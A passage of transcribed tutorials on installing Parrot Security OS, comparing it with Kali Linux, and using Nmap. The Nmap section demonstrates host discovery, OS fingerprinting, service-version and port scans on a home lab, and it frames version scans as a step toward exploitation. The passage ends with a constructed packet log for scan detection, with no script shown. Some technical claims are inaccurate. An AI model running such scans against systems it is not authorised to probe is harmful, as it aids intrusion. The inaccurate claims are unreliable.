kernel, having been founded in 2013. Parrot Security contains several hundred tools targeted towards various information security tasks such as penetration testing, security research, computer forensics and reverse engineering. It has become a multi-platform solution, accessible and freely available to information security professionals and hobbyists. It features a distinct forensics mode that does not mount any of the system hard disks or partitions and has no influence on the host system, making it more stealthy than regular mode. This mode is used with the host system when there is a need for executing forensic procedures. In software development, a rolling release is a paradigm in which software upgrades are rolled out constantly rather than in batches of versions; this ensures that the software is constantly up to date. A rolling release distribution such as Parrot Security OS follows the same concept, providing the most recent Linux kernel and software versions as they become available on the market. With the basic introduction to the operating system out of the way, let us have a look at the bare minimum system requirements necessary to be able to run this operating system. First up we have the CPU requirement, which states that a 1 GHz dual-core CPU is the absolute minimum in order to use Parrot OS, while multi-core systems will provide more optimum performance. A small caveat is included here: a very distinct thing to be noted is that the operating system can be installed on all variants of chipsets, be it 32-bit, 64-bit or the newly popular ARM portfolio of devices. Unlike Kali Linux, which requires some amount of graphical acceleration to display the operating system correctly, Parrot OS has no such requirements and can be used with the leanest of machines. Taking into account the RAM issue, a minimum of 256 MB to 512 MB of free RAM provides the optimum usage scenarios. When the OS is installed on hard drive storage media, it should theoretically occupy around 8 GB
of space, which may extend up to 16 GB depending on the tools being installed out of the box. When it comes to booting options, you have the option of going with the legacy BIOS settings or with the more modern UEFI settings. These are just some of the requirements for the installation of Parrot Security OS. To understand this process more vividly and to learn how virtualization can help install an OS on our existing computer, please follow the link to our Parrot Security installation video linked right above. Let's understand some of the things that make Parrot Security unique among all the other penetration testing operating systems. Along with the giant catalog of scripts, Parrot Security has its own custom hardened Linux kernel, which has been modified explicitly to provide as much security and resistance to hackers as possible as a first line of defense; the configurations in the operating system act as a second gateway, taking care of malicious requests and dropping them. This is particularly beneficial since, should there be a scenario where the latest Linux kernel is causing some particular issue, the Parrot OS development team will most likely iron it out first before passing it on as an update. If the custom hardened kernel wasn't reason enough, the Parrot Security developers managed to install more hacking tools and scripts to ensure a smooth transition for Kali Linux users. All the tools you find in Kali are present in Parrot OS, and then a few extra ones for good measure. This has been achieved while keeping roughly the same size of installation file between both operating systems. However, it's not all productivity points for Parrot OS. They provide a choice between two different desktop environments: the MATE desktop, which comes pre-installed by default, and KDE. For those unfamiliar with Linux terminology, you can think of desktop environments as the main UI for a Linux system. Being highly modular in nature, one can use Kali Linux or Parrot OS while adding
another desktop environment which they find appealing. Where Kali has only a single option, Parrot OS has managed to provide two optimized builds, with the MATE desktop and the KDE desktop ready-made on their website. One of the primary advantages of Parrot OS over Kali is that it's relatively lightweight. This implies that it takes considerably less disk space and computing power to function properly, with as little as 320 MB of RAM required. In reality, Parrot OS is also designed to operate successfully off a USB stick, whereas Kali Linux does not work as well from a USB stick and is generally installed in a virtual machine. Parrot OS can be seen as more of a niche distribution if you're searching for something lighter than Kali Linux. There are multiple ways to go about this installation. Many people prefer to install it directly onto a hard disk, where the Parrot Security OS will overwrite whichever data the hard disk already has. Now, this is beneficial if you want to preserve your data for the long term, but this might pose some trouble to people who do not have a spare hard disk or do not want to lose their current installation of the Windows operating system. Another way to use Parrot Security is by using the live boot, but whatever changes you make to the live boot operating system are removed the moment we restart or shut down the system. A very good common ground between both these installations is virtualization. Using virtualization software like VMware or VirtualBox, we can install Parrot Security on our systems while simultaneously saving our data and having the convenience of a host machine, such as a Windows operating system, in case things go wrong. To start the installation, we first need to get an ISO file for the Parrot Security operating system. This can be found on the current website, parrotsec.org. Once you enter the website, move into the download section and select "Get Security Edition" over here. Parrot Security OS has multiple desktop environments for you to choose from. These desktop
environments serve as different user interfaces for the user. For example, right now we have the MATE desktop and the KDE desktop; as you can see from the screenshots, both of these look quite different while having a similar look and feel to them. For our example, let's go with the MATE desktop. We have two options: either we can go with the direct download or we can get the torrent file. For this example, we press on the download button and our download will start. I have already downloaded this file, but the ISO file provided over here will serve as the installation medium; it will take around four and a half GB of space, and it will be used to install this operating system in VMware. Once the file is downloaded, we can close this and open VMware Workstation. VMware can be used either as the Player version or the Workstation version; if you have much more familiarity with using VirtualBox or another virtualization application, we can use that as well. Once VMware is open, we'll click on File and select New Virtual Machine. For the first-time installation we're going to go with the typical and recommended installation procedure instead of an advanced one. If you have already installed multiple virtual machine OSes, going with the advanced option will give you much more control over the hardware customization, but for now we're going to stick with the typical option. Moving on, it will ask us for a source from where to install the operating system. Since we're going to use a live ISO first, we're going to select the third option, which is "I will install the operating system later", and press Next. As we already know, Parrot Security is a Debian derivative, so when selecting a guest operating system type we're going to go with Linux, and for the version we're going to choose whichever the highest version of Debian is, along with a 64-bit OS. We're going to click on Next. We're going to name our virtual machine, let's say Parrot Security OS, and select the location where we want to save the virtual
machine. This will hold the entire hard disk of the operating system installation. We're going to click on Next. For the disk size, we're going to specify how much of the current storage we are going to allocate. This is the hard disk storage of the operating system installation: whatever changes you make in the operating system, whatever applications we install on the virtual instance, will all be stored in this amount of storage. While it is recommended to go with at least 15 GB of storage, you can go as high as possible; we're going to select the recommended 20 GB as written. When given the choice of storing the virtual disk as a single file or multiple files, many people want to keep their virtual instance in a way that helps them stay portable. People change systems, and sometimes they want to swap their instances between their work and their personal computer. If there is no portability in mind, storing the virtual disk as a single file gives the best performance and should be the recommended go-to when installing for the first time. We click on Next here and it's going to give us a summary of the settings we have settled on until now. We're going to press on Finish and there we go, we have the first step of our installation completed. From here on out, we're going to click on Edit virtual machine settings. Here we're going to have a look at some of the requirements that Parrot Security OS will need. It is known to be a memory-lightweight operating system, but just to have almost optimum performance we're going to provide around 2 GB of RAM from our host system, which is a Windows 10 machine. When it comes to the processors, I'm going to increase it to 2 and the number of cores to 2 as well, so giving a total of four processor cores to the operating system. Now, this depends on what your computer rig is and how many resources you can justify, so these need to be customized according to the system at hand. The hard disk size has already been set at 20 GB, the rest of them are pretty standard and we
can go on. One thing that we need to make sure of is selecting the CD/DVD (IDE) entry. Here we have to use an ISO image file; previously it was set to "Use physical drive" with "Auto detect". We're going to select "Use ISO image file" over here, click on Browse, go to where we have downloaded the ISO file, which is over here, and select it. Press OK here and we can now power on this virtual machine. At this point of time there are two options: we can go with the Try/Install option using the graphical user interface, or we can go using the terminal mode. To get a better user experience we're going to go with the Try/Install mode specifically, press Enter, and it's going to start the live boot ISO. Meanwhile, VMware has a prompt over here where it will try to install some VMware Tools on it. While this is not mandatory, it is much more recommended to install these tools so that you can get some additional features like drag and drop with the host system and many more things. For now we're going to close this prompt. As you can see, this is the live boot ISO of the Parrot Security operating system; currently it's running the MATE desktop, as we had downloaded from the website. A live boot ISO is useful to get a good feel of the operating system. There are many good Linux distros that have this live boot option so that you can give the operating system a try before installing it permanently. Once you are into the live boot, we can start the installation using the shortcut, as you can see, Install Parrot. I'm going to double-click it, and this is the Calamares installer. Choose your language as American English and press Next. You can select your time zone according to your location and go Next. At this point of time you have to choose the correct keyboard. Now, what many people get confused about is choosing their own language keyboard, but what people must keep in mind is which keyboard the laptop provides. Most of the systems that come pre-built provide the English US keyboard,
so whatever keyboard you choose, make sure to type here and test that all the buttons, including the superscript and subscript buttons, are working correctly before moving forward with this step. Once you have settled on the keyboard that you need to install, you can go ahead. Here it will ask you to select a storage device, and the only option you are going to get is the amount of hard disk storage you have given in the virtual machine settings. We have already provided 20 GB of storage; we're going to choose that and we're going to erase this disk. Manual partitioning can be useful when you are going to install Parrot Security alongside an operating system, or on a hard disk which already includes a Windows OS. For now we're going to select Erase disk and press Next. We're going to give our full name, let it be Simplilearn; you can give the name of the computer, and this is the username which we will use to log in. This is the root password that we are going to give over here. The root password, just as in Kali Linux, will act as the administrative access and it will be necessary when making changes to the system or installing and updating software. Enter the password and repeat it over here. You have the option to log in automatically without asking for the password, but for security purposes it is recommended to keep this disabled. Click on Next. This is another summary of the installation that we are going to move forward with; have a look that whatever changes we have made are according to your requirements, and once everything is checked we can press on Install. Click on Install now and we're going to let it complete the work. As you can see, the installation of Parrot Security is now completed. We're going to make sure that we have the Restart now button over here disabled, and I am going to click on Done. We're going to shut down this live boot ISO: I'm going to click on Menu, turn off the device and shut down, but not restart straight away, because, if you remember correctly, in the virtual
machine instance settings we had given it an ISO file. It says "Please remove the live medium and press Enter to continue"; we can just press Enter to continue and it's going to shut down. Now, to move on, we're going to click on Edit Virtual Machine Settings, go into CD/DVD, and we're going to use the physical drive now; we're going to remove the ISO image file, because the installation has already been completed and we don't want to boot the same ISO file again and again. By using the physical drive over here, it's going to detect the 20 GB hard disk that we have already provided, on which the installation is done. I'm going to press OK, and we're going to power on this virtual machine for testing. Make sure you click Yes over here. This is the GRUB menu; here we get different choices, for example with or without the NVIDIA drivers, or some other advanced options. More often than not we're going to choose the first option and press Enter. If you remember clearly, we did not get the option of Try/Install or a terminal run like we did in the live boot ISO; since this is running straight from the 20 GB hard drive storage, it's going to start the OS directly, now with the login screen. You can see our username over here as we provided in the installation; we're going to enter our root password and press Enter, and this is a working desktop of the Parrot Security operating system. You can open the terminal over here, and we're going to try the root password and an installation. To install any software we're going to use the command sudo apt install, and then the package, neofetch. We're going to use the root password that we used to log in, and press y for yes. This is just an additional step that we're doing to check that the installation is done correctly with the correct amount of hardware resources that we had provided. Now that we have installed neofetch, we can write the command neofetch and this is going to give us some information about our installation. You can see the OS name as Parrot OS 4.11, it is
running on a VMware host, the kernel version, and some other information like the number of packages installed, the current shell version, the resolution of the VMware instance that we are running, the desktop environment, which is MATE as we had downloaded, and some other things. You can see the memory is reported as 1951 megabytes, which is supposed to equal around the 2 GB of RAM that we had provided.

Kali Linux and Parrot OS are two popular penetration testing distributions. While these operating systems each have unique offerings, the overall choice can differ between personnel thanks to the various tools and hardware specifications. Today we will look at both these distributions and settle on the perfect choice for each type of user. Let's go to the agenda for this video. We will learn about Kali Linux and Parrot Security OS from scratch while understanding their primary selling points as Linux distributions geared towards penetration testers. Next we learn about some features of these operating systems that make them stand out. Finally we directly compare Kali Linux and Parrot Security OS, thereby making a clear-cut conclusion on which OS is perfect on a per-requirement basis.

So let's start by learning about Kali Linux from the ground level. Kali Linux, which was formerly known as BackTrack Linux, is an open source Linux distribution aimed at advanced penetration testing and security auditing. It contains several hundred tools targeted towards various information security tasks such as penetration testing, security research, computer forensics and reverse engineering. Kali Linux is a multi-platform solution, accessible and freely available to information security professionals and hobbyists. Among all the Linux distributions, Kali Linux takes its roots from the Debian operating system; Debian has been a highly dependable and stable distribution for many years, providing a similarly strong foundation to the Kali Linux desktop. While the operating system can practically
modify every single part of our installation, the networking components of Kali Linux come disabled by default. This is done to prevent any external factors from affecting the installation procedure, which may pose a risk in critical environments. Apart from boosting security, it allows a more profound element of security control to the most enthusiastic of users.

Now let's take a look at the Parrot Security operating system. Parrot Security OS is a Debian-based distribution with an emphasis on security, privacy and development. It is built on Debian's testing branch and uses a custom hardened Linux kernel. Parrot Security contains several hundred tools targeted towards tasks such as penetration testing, computer forensics, reverse engineering and security research. It is seen as a generally lightweight distribution that can work under rigorous hardware and software specifications. It features a distinct forensics mode that does not mount any of the system's hard disks or partitions and has no influence on the host system, making it much more stealthy than its regular mode; this mode is used on the host system to execute forensic procedures. A rolling release is a paradigm in which software upgrades are rolled out constantly rather than in batches of versions; in software development, this ensures that the software is constantly up to date. A rolling release distribution such as Parrot Security OS follows the same concept: it provides the most recent Linux kernel and software versions as soon as they become available.

With the basic introduction to the operating systems out of the way, let us take a look at the unique features of both Kali Linux and Parrot Security OS. The latest version of Kali Linux comes with more than 600 penetration tools pre-installed. After reviewing every tool included in BackTrack, the developers eliminated a significant number of tools that either simply did not work or duplicated other tools that provided the same or similar functionality. The
Kali Linux team comprises a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols. Restricting access to critical code bases from external parties dramatically reduces the risk of source contamination, which could cause Kali Linux users worldwide a great deal of damage as direct victims of cyber crime. Although penetration tools tend to be written in English, the developers have ensured that Kali includes proper multilingual support, allowing more users to operate in their native language and locate the tools they need for their job. The more comfortable a user feels with the intricacies of the operating system, the easier it is to maintain a strong hold over the configuration and the device in general. Since ARM-based single board systems like the Raspberry Pi are becoming more prevalent and inexpensive, the development team knew that Kali's ARM support would need to be as robust as they could manage, with fully working installations. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution, so the tools for ARM are updated in conjunction with the rest of the distribution.

Let's take a look at some of the features of the Parrot Security operating system now. Along with a giant catalog of scripts, Parrot Security OS has its own hardened Linux kernel, modified explicitly to provide as much security and resistance to hackers as possible as the first line of defense; the configurations in the operating system act as the second gateway, taking care of malicious requests and dropping them. This is particularly beneficial since, should there be a scenario where the latest Linux kernel is causing some particular issue, the Parrot OS development team will most likely iron it out first before passing it on as an update. As if a hardened kernel was not enough, the Parrot Security developers managed to include more hacking tools and
scripts to ensure a smooth transition for Kali Linux users. All the tools you find in Kali are present in Parrot OS, and a few extra ones for good measure, and this has been achieved while keeping roughly the same operating system size between both of them. However, that is not all of the productivity points for Parrot OS: they provide a choice between two different desktop environments, MATE, which comes pre-installed by default, and KDE. For those unfamiliar with Linux terminology, you can think of desktop environments as the main UI for a distribution. Being highly modular in nature, one can use Parrot Security OS while adding another desktop environment that they find appealing. While Kali Linux has only a single option, Parrot Security has provided two optimized builds, with the MATE desktop and the KDE desktop. One of the primary advantages of Parrot OS over Kali Linux is that it's relatively lightweight; this implies that it takes significantly less disk space and computing power to function correctly, with as little as 320 MB of RAM required. In reality, Parrot OS is designed to operate successfully off a USB stick, whereas Kali Linux does not work well from a USB drive and is generally installed in a virtual machine. Parrot OS is more of a niche distribution if you're searching for something lighter than Kali.

Features are great, but what about performance and real-world metrics? Let us compare both these operating systems directly with respect to their hardware specifications and usability; in the end we can decide on which distribution is fit for each type of user. For a first point of comparison, let's take a look at the RAM required for optimum performance of the operating system, which is highly essential when trying to crack hashes or something of a similar nature; RAM usage is a very important facet. While Kali Linux demands at least 1 GB of RAM, Parrot Security can operate optimally with a minimum of 320 MB of RAM. For properly displaying graphical elements, Kali Linux requires GPU-based
acceleration, while this is not the case with Parrot Security OS, which doesn't require any graphical acceleration from the user side. Once these operating systems are installed on VMware using the live boot ISOs, they take up a minimum amount of hardware storage: both of these operating systems have a recommended disk storage of a minimum of 20 GB for Kali Linux and a minimum of 15 GB for Parrot Security, so that they can install all the tools included in the ISO file. When it comes to the category and selection of tools, Kali Linux has always been the first in securing every single tool available for hackers in the penetration testing industry. Parrot Security, on the other hand, has managed to take it up a notch; while specializing in wireless pen testing, Parrot Security makes it a point that all the tools that Kali Linux provides have been included in the ISO, while simultaneously adding some extra tools that many users would have to install from third-party sources in Kali Linux. Being a decade-old penetration testing distribution, Kali Linux has formed a very big community with a strong support signature. Parrot Security, on the other hand, is still growing, and it is garnering much more interest among veteran penetration testers and ethical hackers. A primary drawback of Kali Linux is the extensive hardware requirement to perform optimally: it requires more memory than Parrot Security, it also needs graphical acceleration, and it demands more virtual hard disk storage. Parrot Security, on the other hand, was initially designed to run off a USB drive directly, thereby having very minimal requirements from a hardware perspective, like just 320 MB of RAM and no graphical acceleration needed. This means Parrot Security is much more feasible for people who are not able to devote massive resources to either their virtual machine or their laptop hard disk directly. With the comparison done between both of these operating systems, let's take a look at the type of users both of these
are catered to. One can go with Kali Linux if they want the extensive community support offered by its users, if they want to go with a trusted development team that has been working on this distribution for many years, if they have a powerful system which can run Kali Linux optimally without bottlenecking performance, and if they are comfortable with a semi-professional environment, which may or may not be very useful for new beginners. One can decide to go with Parrot Security if they want a very lightweight and lean distribution that can run on pretty much all systems; it also has a lot of tools pre-installed, and some of them are not even present on Kali Linux. It is much more suitable for underpowered rigs where users do not have a lot of hardware resources to provide to the operating system, and thereby it is much more feasible for people with underpowered laptops or no graphical acceleration, compared to Kali Linux. Parrot Security's desktop environment is also relatively easier to use for new beginners; for people who are just getting into ethical hacking, Parrot Security does a relatively better job of introducing them to the operating system and the various tools without dumping them into the entire intricacies.

With ethical hacking and penetration testing becoming mainstream in corporate environments, trained personnel and relevant equipment are in high demand. The right software framework can be the tipping point in a hacking campaign which deals with intricate hardware. One such tool that has been a mainstay for decades is Nmap. When it comes to scanning machines for open ports and services, Nmap has always been the first choice for hackers; being lightweight and open source, Nmap has strong community backing and receives regular updates. Let's take a look at the topics to be covered today. We start by learning about the different phases in ethical hacking and where Nmap is most valuable to ethical hackers. We learn the basics of Nmap and its
purpose during a penetration testing campaign. Next we take a look at the top-level approach of Nmap as a scanning tool and how it conducts these scans on host machines. Moving on, we cover the multiple modes and types of scans that can be performed using Nmap on unsuspecting users. We also look at some alternatives that users can prefer if Nmap is not something they are comfortable with. Finally, a live demonstration of the powers of Nmap will help in shedding light on the topics being taught today.

Let us first understand where and why Nmap is essential. There are essentially five phases in ethical hacking. The reconnaissance phase is the first phase of the penetration test; here the security researcher collects information about the target. It can be done actively or passively or both. It helps security firms gather information about the target system, network components, active machines, etc. This activity can be performed by using the information publicly available and by using different tools. The scanning phase is more tool-oriented rather than being performed manually: the tester runs one or more scanner tools to gather more information about the target. By using various scanners such as war dialers, port scanners, network mappers and vulnerability scanners, the penetration tester collects as many vulnerabilities as possible, which in turn help to attack a target in a more sophisticated manner. In the gaining access phase, the penetration tester tries to establish a connection with the target and exploit the vulnerabilities found in the previous phase. The exploitation may be a buffer overflow attack, a denial of service attack, session hijacking and many more; basically the penetration tester extracts information and sensitive data from the servers by gaining access with different tools. In the maintaining access phase, the penetration tester tries to create a backdoor for himself; it helps him to identify hidden vulnerabilities in the system while allowing him to come back to the system to retrieve
more data. Further on, in the clearing tracks phase, the tester tries to remove all logs and footprints which might help the administrator identify his presence. This helps the tester to think like a hacker and perform corrective actions to mitigate those activities. Nmap is most beneficial in the early stages of ethical hacking, where a hacker must figure out the possible entry points to a system; it is necessary to know this before running the necessary exploits, thus allowing the hackers to leverage any insecure openings and reach the device. So the reconnaissance and scanning phases are the points where Nmap finds the most use.

Let us now understand what Nmap is from a layman's perspective. Nmap, which stands for Network Mapper, is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host and service uptime. The program is most commonly used via a command line interface and is available for many different operating systems such as Linux, FreeBSD and Gentoo. It is most beneficial in the early stages of ethical hacking, where a hacker must figure out the possible entry point to a system before running the necessary exploits. Nmap was developed for enterprise-scale networks and can scan through thousands of connected devices; however, in recent years Nmap is being increasingly used by smaller companies as well. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services these hosts are offering, what operating systems they are running, what type of packet filters and firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks but works fine against single hosts as well. The rise of the IoT in particular now means that networks used by these companies have become more complex and therefore harder to secure. Since every application that
connects to a network needs to do so via a port, the wrong port or server configuration can open a can of worms that leads to a thorough breach of the system. The recent emergence of IoT botnets like Mirai has also stimulated interest in Nmap, not least because of its ability to interrogate devices connected via the UPnP protocol, but also to highlight any devices that may be malicious.

Now that we understand what Nmap is, let us take a look at the workflow of how an ethical hacker uses this tool in penetration testing. At a practical level, Nmap is used to provide detailed real-time information on your networks and the devices connected to them. We have the hacker running Nmap on a system, with a victim machine running a standard installation of an operating system, be it Windows, macOS or Linux. The Nmap interface will send specially crafted packets to generate some reply from the victim machine; the victim machine in return will send some information back to the Nmap host, replying with some of the services and hosts that are being run on the computers. Nmap allows network admins to find which devices are running and to discover open ports and other services; this in turn helps discover the vulnerabilities and the possible entry points for hackers to breach into.

We are now aware of how Nmap works on a basic level, but there are many varieties of scans that users can run on local machines; let's take a look at some of them. The ping sweep is a simple type of Nmap scan where it pings all the available IP addresses to check which IPs respond to the ICMP protocol. If the users need to know only the number of IP addresses and not many details, the ping sweep is very useful; it's fast, and hence the results to be known are fetched very easily. The SYN scan is the most useful type of Nmap scan, and it does its work very quietly. It sends a SYN packet via the TCP protocol, or the Transmission Control Protocol, to all the intended ports; if an acknowledgment packet is received by the system, it is sure that a port
is open there. No response means that the port is either closed or not available; here the acknowledgment packet is not sent back to the system, assuming that the connection is not valid. The scan is not shown in most of the scan logs, and hence it is safe to use SYN to identify the open ports. The TCP connect scan is similar to the SYN scan in many aspects, as it uses the TCP layer to send packets and is passed to all the ports; here the difference is that the full connection is completed by sending the acknowledgment packets back. The logs can easily find the TCP connect scan, and it needs more power from the machines to do the work, but it is more accurate. If all the accesses related to the OS are available to the user, it is better to do a TCP connect scan than a SYN scan, as all the low-level and high-level accesses are required for the scan. The network is also loaded more, and hence users must be careful about overloading the system and the networks. The idle scan is really used to check whether any malicious attacks are planned on any particular network; users need not control the external host, but an IP address and a port should be given to the same. All of the requirements are taken from the scanner itself. RPC scans, or remote procedure call scans: RPCs are used by hackers to make the system vulnerable to virus attacks, so it is necessary to know whether our system answers such calls and makes our system open to malware. The RPC scan is done to check this, by finding the ports open with certain commands being run by RPC. The window scan is a simple scan where the application scans the acknowledgment packets received from the host once the SYN packets are sent; if there are any abnormalities in the ACK packets received, the scan reports the same and helps in recognizing which ports are functioning in a different manner. The bounce scan is used to check the security in the file transfer protocol layer. FTP layers mostly do not accept any packets, and once a packet is rejected from the FTP layer, there are chances that it
might be sent to an internal layer so that it can access the internal machines; the bounce scan checks this loophole by doing exactly the same process and identifies whether the FTP layer is open to vulnerability or not. The FIN scan is similar to the SYN scan, where the system that sends the packets receives the response back, and it will mostly be a TCP FIN packet; if the system sends an RST packet, it is a false alarm and users need not be worried about the same. The NULL scan is useful for systems other than Windows, where the systems can easily identify what kind of packets they have received and respond back with either TCP packets or non-responses; NULL scans are not useful for Windows, as they may not always produce the desired results.

When it comes to looking at alternatives, there is a wide range of free network monitoring utilities as well as free open source vulnerability scanners available to network administrators and security auditors. What makes Nmap stand out as a tool IT and network security managers need to know is its flexibility and power. There are some alternatives to Nmap, but most of them are focused on providing specific niche functionality that the average system administrator does not need frequently. Masscan, for instance, is much faster than Nmap but provides less detail. In reality, however, Nmap provides all the functionality and speed that the average user requires, especially when used along with other similar tools like Netcat, which can be used to manage and control network traffic, and Zenmap, which provides a graphical user interface for Nmap. As an all-round solution to network scanning, nobody can go wrong with Nmap as their tool of choice.

Let's now take a tour of Nmap based on all the things we have covered today. In this live demonstration, we start by learning how to install Nmap on a fresh operating system that doesn't come pre-installed with the tool. We also cover the different types of scans that can be run on local machines, along with checking multiple
inferences an ethical hacker can gather based on the output of an Nmap scan. Finally, we run scans on vulnerable machines to get an idea of how to proceed with the outputs we gather using this tool. If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn; click on the link in the description to know more.

The first step in our demonstration is installing Nmap. Now, it depends heavily on what Linux distribution you're going to use to perform ethical hacking; right now I am using the Parrot Security operating system. If you are not aware of what Parrot Security is, or even what Kali Linux is, we highly suggest that you check out the videos on those two operating systems on our YouTube channel so that you can get a fair idea of what they serve. Now, if you are using either of these two operating systems, Nmap should come pre-installed by default. To check if Nmap is pre-installed or not, you can just press on Applications over here, go to the Pentesting section, go to the Information Gathering tab, and you should be able to see Nmap right here. Now let's say you do not have Nmap pre-installed; maybe you're using a Linux distribution like Ubuntu or Linux Mint or something that is based on the Debian operating system. One thing you have to make sure of is that nmap is in the distribution repository. Once you check that, or even if you do not know if it is present, you can just run the command sudo apt install nmap. sudo gives root permissions for the installation; apt is the package manager of all Linux distributions that are based on Debian, and that goes for Debian stable, Ubuntu, Linux Mint, Kali Linux, Parrot Security and anything of that nature. apt is the package manager which handles the installation and removal of applications in these specific operating systems. Once you are here, just write install and nmap, press Enter, and it's going to ask you for the root password that was set when you installed the operating system in the first place.
Enter your root password and press Enter again. As you can see, it's saying that nmap is already installed, the newest version, since I am running the Parrot Security operating system. Now, should you be running this operating system or even Kali Linux, you should receive a similar message, and the installation is already done. If you are using some other distribution, let's say BlackArch, Arch Linux or Manjaro, anything like that, the installation steps will be slightly different; this sudo apt install nmap command is for distributions that are derived from Debian and Ubuntu. If you want to install it on Arch Linux based distributions, you have to use that package manager, which is known as pacman, but that is a different story, and if you want to get into ethical hacking, the best way to start is by learning either Kali Linux or Parrot Security.

Now that the installation is done, we're going to learn how to use nmap. One of the most basic functions of nmap is to identify active hosts on the network; we can do this by using a ping scan. The ping scan identifies all of the IP addresses that are currently online without sending any packets to these hosts. Now, to run the ping scan, we're going to write nmap, and the flag we're going to mention over here is -sP. These flags are the different traits of the nmap scan; depending on what flag we use, we can send different kinds of requests to the host that we are scanning. Now, before moving forward with this, let me open another terminal over here and check the IP address. We're going to write the command ifconfig and find the subnet in which this system is present. As you can see, the IP address is 192.168.72.131. Now, this operating system is being run on virtual machine software known as VMware, and VMware itself is running on a Windows 10 operating system; considering they are now a part of the local network, this IP address is of Parrot Security, and the Windows operating system, which is the host system in my scenario, will fall in this particular subnet,
so to run our scan, we're going to target 192.168.72.1/24. This command then returns a list of hosts on your network and the total number of assigned IP addresses. It's going to be a capital P. If you spot any hosts or IP addresses on that list that you cannot account for, you can then run further commands to investigate them. As of right now, you can see the machine that is Parrot Security, whose IP address can be detected in the subnet. 192.168.72.1 is my local Windows machine that is running the VMware software and ultimately this virtual machine. 192.168.72.2 is the DHCP server that provides the internet connection of Parrot Security; this we can ignore for now. Now, the Windows machine that we have over here, let's run some tests on that. I'm going to clear the terminal; you can close this, actually. When scanning hosts, nmap commands can use server names, IPv4 addresses or IPv6 addresses. A basic nmap command will produce information about the given host; to run the basic port scan we can just use nmap along with the IP. Now, as you remember, the IP is 192.168.72.1, the IP of my local Windows 10 machine. As you can see, it shows the ports that are open and the particular services that these ports are running. Now we can also have detection of the operating system; mind you, this is not 100% correct, and the reliability depends on the installation and what kind of fingerprinting measures are available. Since this does TCP fingerprinting, it needs some extra permissions; the flag that we are going to use is nmap -O along with the same IP address. Like I said, since this is TCP fingerprinting, it requires root privileges; to provide root privileges we're just going to add the sudo keyword before nmap and repeat the same command that we wrote above. As you can see, it has successfully detected that I am running Microsoft Windows 10.
With this MAC address, it has also shown the correct build number of the Windows 10 system that I am using. This is useful for troubleshooting, scanning for a few vulnerabilities, or even locating some services that need to be updated. To look at the necessary information about these services, for example what versions they are using, we have a flag known as -sV, which stands for service version; we use the same IP address and press Enter. Now, as you can see, the scan is complete, and if you check the results of the scan above, we didn't see any version numbers for the services; here we can actually check what version they are running. This becomes helpful when we are trying to find specific versions to exploit: for example, if VMware Workstation 16.1.2 had some particular vulnerability, we can exploit it by checking this command. Apart from host scanning, port scanning is one of the most basic utilities, and there are a few ways that this command can be customized as well. For example, I have already checked that port 443 is open, but I found that out after running this lengthy scan; let's say I only want to check if port 443 is open. With nmap, I'm going to use the flag -p, which stands for port, and give 443 as an argument, using the same IP address, and you can see it says it's open, but we already knew it is open. Let's say there was something else; let's say we're going to scan if the Apache web server port is open, which usually runs on 80. Obviously, since I'm not running an Apache web server, it says it's closed. Now we can combine these two commands by running both simultaneously; to do that we can just put a comma between them and complete the rest. As expected, 80 is closed and 443 is open. Another feature of nmap for port scanning is specifying ranges; ranges can be beneficial when you're trying to see up to a certain limit. For example, nmap -p, and we're going to check what ports are open between 100 and, let's say, 2000.
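The SYN scan and the TCP connect scan described above leave different traces on the scanned host, and that difference is what a defender's detection keys on: a SYN scanner answers the target's SYN/ACK with RST, a connect scanner completes the handshake with ACK. As an added example that is not part of the original video, the following Python script classifies sources in constructed packet-summary lines (not a real capture; the IPs reuse the 192.168.72.0/24 lab subnet from the demo) by how many distinct ports they hit and whether they completed or aborted their handshakes:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed packet-summary lines (not a real capture): one TCP segment per
# line, "<time> <src>:<sport> > <dst>:<dport> <flags>", S=SYN A=ACK R=RST F=FIN.
# 192.168.72.131 runs a SYN (-sS style) scan: open ports answer SYN/ACK and the
# scanner replies RST instead of ACK; closed ports answer RST/ACK.
# 192.168.72.50 runs a connect scan: every handshake is completed with an ACK.
# 192.168.72.20 is an ordinary client making a single HTTPS connection.
SAMPLE_LOG = """\
2023-05-01T10:00:00 192.168.72.131:40001 > 192.168.72.1:135 S
2023-05-01T10:00:00 192.168.72.1:135 > 192.168.72.131:40001 SA
2023-05-01T10:00:00 192.168.72.131:40001 > 192.168.72.1:135 R
2023-05-01T10:00:00 192.168.72.131:40002 > 192.168.72.1:139 S
2023-05-01T10:00:00 192.168.72.1:139 > 192.168.72.131:40002 SA
2023-05-01T10:00:00 192.168.72.131:40002 > 192.168.72.1:139 R
2023-05-01T10:00:01 192.168.72.131:40003 > 192.168.72.1:445 S
2023-05-01T10:00:01 192.168.72.1:445 > 192.168.72.131:40003 SA
2023-05-01T10:00:01 192.168.72.131:40003 > 192.168.72.1:445 R
2023-05-01T10:00:01 192.168.72.131:40004 > 192.168.72.1:80 S
2023-05-01T10:00:01 192.168.72.1:80 > 192.168.72.131:40004 RA
2023-05-01T10:00:01 192.168.72.131:40005 > 192.168.72.1:22 S
2023-05-01T10:00:01 192.168.72.1:22 > 192.168.72.131:40005 RA
2023-05-01T10:02:00 192.168.72.50:51000 > 192.168.72.1:135 S
2023-05-01T10:02:00 192.168.72.1:135 > 192.168.72.50:51000 SA
2023-05-01T10:02:00 192.168.72.50:51000 > 192.168.72.1:135 A
2023-05-01T10:02:00 192.168.72.50:51001 > 192.168.72.1:139 S
2023-05-01T10:02:00 192.168.72.1:139 > 192.168.72.50:51001 SA
2023-05-01T10:02:00 192.168.72.50:51001 > 192.168.72.1:139 A
2023-05-01T10:02:01 192.168.72.50:51002 > 192.168.72.1:445 S
2023-05-01T10:02:01 192.168.72.1:445 > 192.168.72.50:51002 SA
2023-05-01T10:02:01 192.168.72.50:51002 > 192.168.72.1:445 A
2023-05-01T10:02:01 192.168.72.50:51003 > 192.168.72.1:443 S
2023-05-01T10:02:01 192.168.72.1:443 > 192.168.72.50:51003 SA
2023-05-01T10:02:01 192.168.72.50:51003 > 192.168.72.1:443 A
2023-05-01T10:05:00 192.168.72.20:60000 > 192.168.72.1:443 S
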